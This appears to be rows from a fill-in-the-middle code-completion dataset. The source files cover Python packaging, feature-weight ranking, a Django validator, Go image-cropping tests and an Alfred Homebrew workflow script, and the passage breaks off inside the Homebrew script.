prompt
large_stringlengths
70
991k
completion
large_stringlengths
0
1.02k
<|file_name|>setup.py<|end_file_name|><|fim▁begin|><|fim▁hole|>setup(name='mock_labels', version='0.0.1', packages=['mock_labels'])<|fim▁end|>
from setuptools import setup
<|file_name|>best-feats.py<|end_file_name|><|fim▁begin|>import sys import os import pandas as pd from collections import defaultdict import numpy as np dirname = sys.argv[1] path = os.path.join(dirname, "weights.tsv") with open(path ,"r") as f: df = pd.read_csv(f, sep="\t") df = df[df["iter"] == 5] fc2r = defaultdict(list) features = set() <|fim▁hole|> event_df.loc[event_df["class"] == "SELECT", "rank"] = pos_df["weight"].argsort() for _, row in event_df.loc[event_df["class"] == "SELECT"][["name", "weight", "rank"]].iterrows(): clazz = "SELECT" feature = row["name"] rank = row["rank"] fc2r[(feature, clazz)].append(rank) features.add(feature) neg_df = event_df[event_df["class"] == "NEXT"] event_df.loc[event_df["class"] == "NEXT", "rank"] = neg_df["weight"].argsort() for _, row in event_df.loc[event_df["class"] == "NEXT"][["name", "weight", "rank"]].iterrows(): clazz = "NEXT" feature = row["name"] rank = row["rank"] fc2r[(feature, clazz)].append(rank) features.add(feature) f2d = {} for feature in features: sel_u = np.mean(fc2r[(feature, "SELECT")]) next_u = np.mean(fc2r[(feature, "NEXT")]) diff = max(sel_u, next_u) - min(sel_u, next_u) f2d[feature] = diff print feat_diff = sorted(f2d.items(), key=lambda x: x[1]) for feat, diff in feat_diff[-50:]: print feat<|fim▁end|>
for event, event_df in df.groupby("event"): pos_df = event_df[event_df["class"] == "SELECT"]
<|file_name|>validators.py<|end_file_name|><|fim▁begin|><|fim▁hole|> class MultiFieldsValidator(object): fields = () error_messages = { 'invalid' : _(u'Value is not valid.') } def raise_error(self, form, error="invalid"): for field in self.fields: form._errors[field] = form.error_class([self.error_messages[error]]) def validate(self, cleaned_data, form): return cleaned_data<|fim▁end|>
# coding: utf-8 from django.utils.translation import ugettext_lazy as _
<|file_name|>tools_test.go<|end_file_name|><|fim▁begin|>package imaging import ( "image" "testing" ) func TestCrop(t *testing.T) { td := []struct { desc string src image.Image r image.Rectangle want *image.NRGBA }{ { "Crop 2x3 2x1", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, image.Rect(-1, 0, 1, 1), &image.NRGBA{ Rect: image.Rect(0, 0, 2, 1), Stride: 2 * 4, Pix: []uint8{ 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, }, }, }, } for _, d := range td { got := Crop(d.src, d.r) want := d.want if !compareNRGBA(got, want, 0) { t.Errorf("test [%s] failed: %#v", d.desc, got) } } } func TestCropCenter(t *testing.T) { td := []struct { desc string src image.Image w, h int want *image.NRGBA }{ { "CropCenter 2x3 2x1", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, 2, 1, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 1), Stride: 2 * 4, Pix: []uint8{ 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, }, }, }, { "CropCenter 2x3 0x1", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, 0, 1, &image.NRGBA{ Rect: image.Rect(0, 0, 0, 0), Stride: 0, Pix: []uint8{}, }, }, { "CropCenter 2x3 5x5", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, 5, 5, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 3), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, }, } for _, d := range td { got := CropCenter(d.src, d.w, d.h) want := d.want if !compareNRGBA(got, want, 0) { t.Errorf("test [%s] failed: %#v", d.desc, got) } } } func TestCropAnchor(t *testing.T) { td := []struct { desc string src image.Image w, h int anchor Anchor want *image.NRGBA }{ { "CropAnchor 4x4 2x2 TopLeft", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, TopLeft, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, }, }, }, { "CropAnchor 4x4 2x2 Top", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, Top, 
&image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, }, }, }, { "CropAnchor 4x4 2x2 TopRight", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, TopRight, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, }, }, }, { "CropAnchor 4x4 2x2 Left", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, Left, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, }, }, }, { "CropAnchor 4x4 2x2 Center", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, Center, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, }, }, }, { "CropAnchor 4x4 2x2 Right", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, Right, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, }, }, }, { "CropAnchor 4x4 2x2 BottomLeft", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, BottomLeft, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 
0x26, 0x27, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, }, }, }, { "CropAnchor 4x4 2x2 Bottom", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, Bottom, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, }, }, }, { "CropAnchor 4x4 2x2 BottomRight", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, BottomRight, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, }, { "CropAnchor 4x4 0x0 BottomRight", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 0, 0, BottomRight, &image.NRGBA{ Rect: image.Rect(0, 0, 0, 0), Stride: 0, Pix: []uint8{}, }, }, { "CropAnchor 4x4 100x100 BottomRight", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 100, 100, BottomRight, &image.NRGBA{ Rect: image.Rect(0, 0, 4, 4), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, }, { "CropAnchor 4x4 1x100 BottomRight", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 1, 
100, BottomRight, &image.NRGBA{ Rect: image.Rect(0, 0, 1, 4), Stride: 1 * 4, Pix: []uint8{ 0x0c, 0x0d, 0x0e, 0x0f, 0x1c, 0x1d, 0x1e, 0x1f, 0x2c, 0x2d, 0x2e, 0x2f, 0x3c, 0x3d, 0x3e, 0x3f, }, }, }, { "CropAnchor 4x4 0x100 BottomRight", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 0, 100, BottomRight, &image.NRGBA{ Rect: image.Rect(0, 0, 0, 0), Stride: 0, Pix: []uint8{}, }, }, } for _, d := range td { got := CropAnchor(d.src, d.w, d.h, d.anchor) want := d.want if !compareNRGBA(got, want, 0) { t.Errorf("test [%s] failed: %#v", d.desc, got) } } } func TestPaste(t *testing.T) { td := []struct { desc string src1 image.Image src2 image.Image p image.Point want *image.NRGBA }{ { "Paste 2x3 2x1", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, &image.NRGBA{ Rect: image.Rect(1, 1, 3, 2), Stride: 2 * 4, Pix: []uint8{ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, }, }, image.Pt(-1, 0), &image.NRGBA{ Rect: image.Rect(0, 0, 2, 3), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, }, } for _, d := range td { got := Paste(d.src1, d.src2, d.p) want := d.want if !compareNRGBA(got, want, 0) { t.Errorf("test [%s] failed: %#v", d.desc, got) } } } func TestPasteCenter(t *testing.T) { td := []struct { desc string src1 image.Image src2 image.Image want *image.NRGBA }{ { "PasteCenter 2x3 2x1", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, &image.NRGBA{ Rect: image.Rect(1, 1, 3, 2), Stride: 2 * 4, Pix: []uint8{ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, }, }, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 3), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, }, } for _, d := range td { got := PasteCenter(d.src1, d.src2) want := d.want if !compareNRGBA(got, want, 0) { t.Errorf("test [%s] failed: %#v", d.desc, got) } } } func TestOverlay(t *testing.T) { td := []struct { desc string src1 image.Image src2 image.Image p image.Point a float64 want *image.NRGBA }{ { "Overlay 2x3 2x1 1.0", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0x60, 0x00, 0x90, 0xff, 0xff, 0x00, 0x99, 0x7f, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, &image.NRGBA{ Rect: image.Rect(1, 1, 3, 2), Stride: 2 * 4, Pix: []uint8{ 0x20, 0x40, 0x80, 0x7f, 0xaa, 0xbb, 0xcc, 0xff, }, }, image.Pt(-1, 0), 1.0, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 3), Stride: 2 * 4,<|fim▁hole|> 0x40, 0x1f, 0x88, 0xff, 0xaa, 0xbb, 0xcc, 0xff, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, }, { "Overlay 2x2 2x2 0.5", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 1), Stride: 2 * 
4, Pix: []uint8{ 0xff, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0x00, 0xff, 0xff, 0x20, 0x20, 0x20, 0x00, }, }, &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 1), Stride: 2 * 4, Pix: []uint8{ 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0x20, 0x20, 0x20, 0xff, }, }, image.Pt(-1, -1), 0.5, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0xff, 0x7f, 0x7f, 0xff, 0x00, 0xff, 0x00, 0xff, 0x7f, 0x7f, 0x7f, 0xff, 0x20, 0x20, 0x20, 0x7f, }, }, }, } for _, d := range td { got := Overlay(d.src1, d.src2, d.p, d.a) want := d.want if !compareNRGBA(got, want, 1) { t.Errorf("test [%s] failed: %#v", d.desc, got) } } }<|fim▁end|>
Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff,
<|file_name|>brew.py<|end_file_name|><|fim▁begin|># encoding: utf-8 import os import subprocess import sys from workflow import Workflow3 as Workflow, MATCH_SUBSTRING from workflow.background import run_in_background import brew_actions import helpers GITHUB_SLUG = 'fniephaus/alfred-homebrew' def execute(wf, cmd_list): brew_arch = helpers.get_brew_arch(wf) new_env = helpers.initialise_path(brew_arch) cmd, err = subprocess.Popen(cmd_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=new_env).communicate() if err: return err return cmd def get_all_formulae(): return execute(wf, ['brew', 'formulae']).splitlines() def get_installed_formulae(): return execute(wf, ['brew', 'list', '--versions']).splitlines() def get_pinned_formulae(): return execute(wf, ['brew', 'list', '--pinned', '--versions']).splitlines() def get_outdated_formulae(): return execute(wf, ['brew', 'outdated', '--formula']).splitlines() def get_info(): return execute(wf, ['brew', 'info']) def get_commands(wf, query): result = execute(wf, ['brew', 'commands']).splitlines() commands = [x for x in result if ' ' not in x] query_filter = query.split() if len(query_filter) > 1: return wf.filter(query_filter[1], commands, match_on=MATCH_SUBSTRING) return commands def get_all_services(): services_response = execute(wf, ['brew', 'services', 'list']).splitlines() services_response.pop(0) services = [] for serviceLine in services_response: services.append({'name': serviceLine.split()[0], 'status': serviceLine.split()[1]}) return services def filter_all_formulae(wf, query): formulae = wf.cached_data('brew_all_formulae', get_all_formulae, max_age=3600) query_filter = query.split() if len(query_filter) > 1: return wf.filter(query_filter[1], formulae, match_on=MATCH_SUBSTRING) return formulae def filter_installed_formulae(wf, query): formulae = wf.cached_data('brew_installed_formulae', get_installed_formulae, max_age=3600) query_filter = query.split() if len(query_filter) > 1: return wf.filter(query_filter[1], formulae, match_on=MATCH_SUBSTRING) return formulae def filter_pinned_formulae(wf, query): formulae = wf.cached_data('brew_pinned_formulae', get_pinned_formulae, max_age=3600) query_filter = query.split() if len(query_filter) > 1: return wf.filter(query_filter[1], formulae, match_on=MATCH_SUBSTRING) return formulae def filter_outdated_formulae(wf, query): formulae = wf.cached_data('brew_outdated_formulae', get_outdated_formulae, max_age=3600) query_filter = query.split() if len(query_filter) > 1: return wf.filter(query_filter[1], formulae, match_on=MATCH_SUBSTRING) return formulae def filter_all_services(wf, query): services = wf.cached_data('brew_all_services', get_all_services, session=True) query_filter = query.split() if len(query_filter) > 1: return wf.filter(query_filter[1], services, key=lambda x: x['name'], match_on=MATCH_SUBSTRING) return services def add_service_actions(wf, service_name): wf.add_item('Run Service', 'Run the service formula without registering to launch at login (or boot).', autocomplete='services %s run' % service_name, arg='brew services run %s' % service_name, valid=True, icon=helpers.get_icon(wf, 'chevron-right')) wf.add_item('Stop Service', 'Stop the service formula immediately and unregister it from launching at login (or boot).', autocomplete='services %s stop' % service_name, arg='brew services stop %s' % service_name, valid=True, icon=helpers.get_icon(wf, 'chevron-right')) wf.add_item('Start Service', 'Start the service formula immediately and register it to launch at login (or boot).', 
autocomplete='services %s start' % service_name, arg='brew services start %s' % service_name, valid=True, icon=helpers.get_icon(wf, 'chevron-right')) wf.add_item('Restart Service', 'Stop (if necessary) and start the service formula immediately and register it to launch ' 'at login (or boot).', autocomplete='services %s restart' % service_name, arg='brew services restart %s' % service_name, valid=True, icon=helpers.get_icon(wf, 'chevron-right')) def main(wf): if wf.update_available: wf.add_item('An update is available!', autocomplete='workflow:update', valid=False, icon=helpers.get_icon(wf, 'cloud-download')) # Check for brew installation find_brew = helpers.brew_installed() if not (find_brew['INTEL'] or find_brew['ARM']): helpers.brew_installation_instructions(wf) else: # extract query query = wf.args[0] if len(wf.args) else None if (not query and len(wf.cached_data('brew_outdated_formulae', get_outdated_formulae, max_age=3600)) > 0): wf.add_item('Some of your formulae are outdated!', autocomplete='outdated ', valid=False, icon=helpers.get_icon(wf, 'cloud-download')) if query and query.startswith('install'): for formula in filter_all_formulae(wf, query): wf.add_item(formula, 'Install formula.', arg='brew install %s' % formula, valid=True, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('services'): query_filter = query.split() if len(query_filter) == 2 and query.endswith(' '): service_name = query_filter[1] add_service_actions(wf, service_name) else: services = filter_all_services(wf, query) for service in services: wf.add_item(service['name'], 'Select for action. Status: %s' % service['status'], autocomplete='services %s ' % service['name'], arg='', valid=False, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('search'): for formula in filter_all_formulae(wf, query): wf.add_item(formula, 'Open formula on GitHub.', arg='brew info --github %s' % formula, valid=True, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('uninstall'): for formula in filter_installed_formulae(wf, query): name = formula.rsplit()[0] wf.add_item(formula, 'Uninstall formula.', arg='brew uninstall %s' % name, valid=True, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('list'): for formula in filter_installed_formulae(wf, query): name = 